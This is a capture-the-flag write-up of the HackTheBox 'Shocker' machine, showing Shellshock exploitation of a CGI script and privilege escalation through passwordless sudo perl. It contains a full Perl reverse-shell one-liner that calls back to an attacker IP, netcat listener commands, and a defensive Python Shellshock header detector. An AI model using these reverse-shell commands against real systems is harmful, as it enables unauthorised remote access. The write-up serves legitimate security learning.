HackTheBox — Shocker

Shellbr3ak
4 min read · Feb 15, 2020

What's going on, aspiring hackers? This is shellbreak, and today we're doing Shocker from HackTheBox, which is a really easy box.

The idea of the box is a web server vulnerable to Shellshock, a very common vulnerability that allows an attacker to execute shell commands through the web server. It occurs because data from web requests is not properly handled by CGI web server technology: the request data ends up in environment variables, and a vulnerable bash incorrectly executes the commands trailing a function definition when a specially crafted request is sent.

Nmap Scan:

Looking at the results, we see 2 ports open:

  1. port 80: its banner tells us it's an Apache web server (version 2.4.18)
  2. port 2222: its banner tells us it's an OpenSSH server (version 7.2p2)

and the OS is Ubuntu.

Web Enumeration:

Nothing too interesting here, so we’ll try to enumerate the directories with gobuster:

Looking at the result of the enumeration, we see one interesting directory, cgi-bin, but we don't have access to it since the status code is 403. Given the limited results, I think it's a good idea to enumerate further and see whether the cgi-bin directory holds any interesting files.

I set the -x flag to sh because the directory I found is cgi-bin, so its scripts are likely to carry that extension.

In computing, Common Gateway Interface is an interface specification for web servers to execute programs that execute like console applications running on a server that generates web pages dynamically. Such programs are known as CGI scripts or simply as CGIs.

So let's open that file and see if it contains any interesting info.

when we visit the url:

http://10.10.10.56/cgi-bin/user.sh

we get a prompt to download the file:

We don't see anything interesting here, so at this point I assume the right path is to exploit the Shellshock vulnerability to get a shell on the box. Let's try to exploit it manually using Burp Suite.

Exploitation:

According to this reference:

https://github.com/opsxcq/exploit-CVE-2014-6271

the vulnerability can be triggered by making a specially crafted web request.

Read this article if you want a solid understanding of how this vulnerability is triggered behind the scenes:

https://blog.cloudflare.com/inside-shellshock/
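As an added example (not part of the original write-up), here is a small Python detector for the request pattern the vulnerability relies on: Apache's mod_cgi copies request headers into environment variables, so a header value beginning with the bash function-definition prefix "() {" is the signature to alert on. The two sample requests are constructed; the host and path come from the write-up, and the trailing command in the suspicious sample is a harmless echo.

```python
import re
from typing import List, Tuple

# CVE-2014-6271 trigger: an environment variable whose value starts with a
# bash function definition "() {". bash tolerates whitespace between the
# tokens, so the regex does too. Anything after the closing brace is what a
# vulnerable bash would execute, which is why the prefix alone is the signal.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def is_shellshock_payload(value: str) -> bool:
    """True if a header value carries the bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def parse_headers(raw_request: str) -> List[Tuple[str, str]]:
    """Split a raw HTTP/1.1 request into (name, value) header pairs."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")[1:]  # drop the request line
    pairs = []
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def scan_request(raw_request: str) -> List[str]:
    """Return the names of headers that carry a Shellshock trigger."""
    return [n for n, v in parse_headers(raw_request) if is_shellshock_payload(v)]


# Constructed samples: a benign request to the CGI path, and one carrying the
# signature in User-Agent (the command after the prefix is a harmless echo).
BENIGN = (
    "GET /cgi-bin/user.sh HTTP/1.1\r\n"
    "Host: 10.10.10.56\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)
SUSPICIOUS = (
    "GET /cgi-bin/user.sh HTTP/1.1\r\n"
    "Host: 10.10.10.56\r\n"
    "User-Agent: () { :; }; echo shocked\r\n"
    "Cookie: session=abc123\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_request(req))  # benign [] / suspicious ['User-Agent']
```

The same check can be applied to a web server's access log only if it records header values; on an unpatched host the real fix is updating bash, with mod_cgi disabled where it is not needed.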

So, the request looks like the following:

Now let's see if that's going to work:

And indeed it worked: we got ACE (Arbitrary Command Execution) on the box. Now let's try to get a shell:

and be sure not to forget to set up your netcat listener on port 1234:

nc -lvnp 1234

Now if we hit send, we should get the shell:

and we g0t the shell finally. Here's the user's flag:

Now let's head to the root part (the easiest ever):

Generally when I first get a shell on a box, I try to see if that user can execute any commands without providing passwords (even before I run any enumeration scripts), using the command:

sudo -l

As you can see, in the case of this box, user shelly can execute

sudo /usr/bin/perl

with root privileges without providing a password, so getting root access on the box is going to be a piece of cake. I'll be using a Perl one-liner as the command to get a reverse shell:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

but don't forget to put in your own machine's IP address, and to set your netcat listener:

nc -lvnp 1234

on your attacking machine. On the target machine your command should look like the following (note the straight quotes; the curly quotes Medium substitutes will break the one-liner):

sudo /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And we got r00t on the box. Here's the root flag:

So, that was the box. I hope you guys enjoyed it, and I will see you all in the next write-up :).

Shellbr3ak

Offensive Security Engineer | Threat Intelligence Analyst | Cloud/Web App Penetration Tester | CTIA | eWPTXv2 | OSWE | CTF Lover